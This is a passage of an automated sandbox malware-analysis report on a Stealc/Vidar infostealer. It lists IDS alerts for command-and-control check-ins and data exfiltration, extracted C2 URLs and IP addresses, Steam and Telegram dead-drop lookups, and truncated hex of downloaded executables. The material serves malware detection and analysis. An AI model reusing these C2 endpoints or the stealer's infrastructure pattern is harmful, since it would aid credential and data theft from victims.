Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax] 29_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah] 29_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h] 29_2_0040C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah] 29_2_0044C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h] 29_2_00412FDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h] 29_2_0044D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 29_2_00446790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [eax], cl 29_2_0041EFAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+18h] 29_2_0040EFAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 29_2_00433FB0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 39MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49869 -> 77.90.153.241:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49869 -> 77.90.153.241:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 77.90.153.241:80 -> 192.168.2.5:49869
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49869 -> 77.90.153.241:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 77.90.153.241:80 -> 192.168.2.5:49869
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49869 -> 77.90.153.241:80
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49727 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49729 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49731 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49731 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49725 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49760 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 78.47.63.132:443 -> 192.168.2.5:49728
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49764 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 78.47.63.132:443 -> 192.168.2.5:49727
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49766 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49766 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49768 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49768 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49732 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49732 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49733 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49733 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49802 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49802 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49730 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49787 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49769 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49769 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49817 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49817 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49808 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49808 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49857 -> 78.47.63.132:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49860 -> 78.47.63.132:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://77.90.153.241/612acd258782ade8.php
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199832267488
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49876 -> 77.90.153.245:8293
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Mar 2025 12:56:55 GMTContent-Type: application/octet-streamContent-Length: 488448Last-Modified: Thu, 13 Mar 2025 18:13:19 GMTConnection: keep-aliveETag: "67d3203f-77400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 6f 06 17 28 0e 68 44 28 0e 68 44 28 0e 68 44 63 76 6b 45 2d 0e 68 44 63 76 6d 45 bb 0e 68 44 63 76 6c 45 22 0e 68 44 39 88 6b 45 21 0e 68 44 39 88 6c 45 38 0e 68 44 39 88 6d 45 03 0e 68 44 63 76 69 45 2b 0e 68 44 28 0e 69 44 73 0e 68 44 ab 88 61 45 29 0e 68 44 ab 88 97 44 29 0e 68 44 ab 88 6a 45 29 0e 68 44 52 69 63 68 28 0e 68 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1b 17 d3 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 2a 01 00 00 dc 00 00 00 00 00 00 a0 1f 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 07 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 d7 01 00 28 00 00 00 00 20 02 00 e0 01 00 00 00 00 02 00 b4 12 00 00 00 00 00 00 00 00 00 00 00 30 02 00 80 06 00 00 90 ba 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b9 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 40 01 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 28 01 00 00 10 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 9f 00 00 00 40 01 00 00 a0 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1d 00 00 00 e0 01 00 00 0c 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b4 12 00 00 00 00 02 00 00 14 00 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 20 02 00 00 02 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 06 00 00 00 30 02 00 00 08 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 7a 05 00 00 40 02 00 00 7a 05 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Mar 2025 12:56:58 GMTContent-Type: application/octet-streamContent-Length: 375296Last-Modified: Thu, 13 Mar 2025 18:13:19 GMTConnection: keep-aliveETag: "67d3203f-5ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 6f 06 17 28 0e 68 44 28 0e 68 44 28 0e 68 44 63 76 6b 45 2d 0e 68 44 63 76 6d 45 bb 0e 68 44 63 76 6c 45 22 0e 68 44 39 88 6b 45 21 0e 68 44 39 88 6c 45 38 0e 68 44 39 88 6d 45 03 0e 68 44 63 76 69 45 2b 0e 68 44 28 0e 69 44 73 0e 68 44 ab 88 61 45 29 0e 68 44 ab 88 97 44 29 0e 68 44 ab 88 6a 45 29 0e 68 44 52 69 63 68 28 0e 68 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1b 17 d3 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 2a 01 00 00 dc 00 00 00 00 00 00 a0 1f 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 d7 01 00 28 00 00 00 00 20 02 00 e0 01 00 00 00 00 02 00 b4 12 00 00 00 00 00 00 00 00 00 00 00 30 02 00 80 06 00 00 90 ba 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b9 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 40 01 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 28 01 00 00 10 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 9f 00 00 00 40 01 00 00 a0 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1d 00 00 00 e0 01 00 00 0c 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b4 12 00 00 00 00 02 00 00 14 00 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 20 02 00 00 02 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 06 00 00 00 30 02 00 00 08 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 c0 03 00 00 40 02 00 00 c0 03 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Mar 2025 12:57:01 GMTContent-Type: application/octet-streamContent-Length: 257536Last-Modified: Thu, 13 Mar 2025 14:06:58 GMTConnection: keep-aliveETag: "67d2e682-3ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ab 75 68 00 ef 14 06 53 ef 14 06 53 ef 14 06 53 a4 6c 05 52 e4 14 06 53 a4 6c 03 52 5b 14 06 53 fe 92 05 52 f9 14 06 53 fe 92 02 52 fd 14 06 53 fe 92 03 52 b5 14 06 53 a4 6c 02 52 f9 14 06 53 a4 6c 07 52 fe 14 06 53 ef 14 07 53 52 14 06 53 6e 92 0f 52 e9 14 06 53 6e 92 f9 53 ee 14 06 53 6e 92 04 52 ee 14 06 53 52 69 63 68 ef 14 06 53 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d c1 d2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 fa 02 00 00 00 01 00 00 00 00 00 74 0c 01 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 b9 03 00 8c 00 00 00 00 00 04 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 28 22 00 00 e8 90 03 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 f9 02 00 00 10 00 00 00 fa 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ba b6 00 00 00 10 03 00 00 b8 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 d0 03 00 00 12 00 00 00 b6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 00 04 00 00 02 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 22 00 00 00 10 04 00 00 24 00 00 00 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Mar 2025 12:57:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Mar 2025 12:57:19 GMTContent-Type: application/octet-streamContent-Length: 488448Last-Modified: Thu, 13 Mar 2025 18:13:19 GMTConnection: keep-aliveETag: "67d3203f-77400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 6f 06 17 28 0e 68 44 28 0e 68 44 28 0e 68 44 63 76 6b 45 2d 0e 68 44 63 76 6d 45 bb 0e 68 44 63 76 6c 45 22 0e 68 44 39 88 6b 45 21 0e 68 44 39 88 6c 45 38 0e 68 44 39 88 6d 45 03 0e 68 44 63 76 69 45 2b 0e 68 44 28 0e 69 44 73 0e 68 44 ab 88 61 45 29 0e 68 44 ab 88 97 44 29 0e 68 44 ab 88 6a 45 29 0e 68 44 52 69 63 68 28 0e 68 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1b 17 d3 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 2a 01 00 00 dc 00 00 00 00 00 00 a0 1f 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 07 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 d7 01 00 28 00 00 00 00 20 02 00 e0 01 00 00 00 00 02 00 b4 12 00 00 00 00 00 00 00 00 00 00 00 30 02 00 80 06 00 00 90 ba 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b9 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 40 01 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 28 01 00 00 10 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 9f 00 00 00 40 01 00 00 a0 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1d 00 00 00 e0 01 00 00 0c 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b4 12 00 00 00 00 02 00 00 14 00 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 20 02 00 00 02 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 06 00 00 00 30 02 00 00 08 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 7a 05 00 00 40 02 00 00 7a 05 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 77.90.153.241Connection: Keep-AliveCache-Control: no-cache
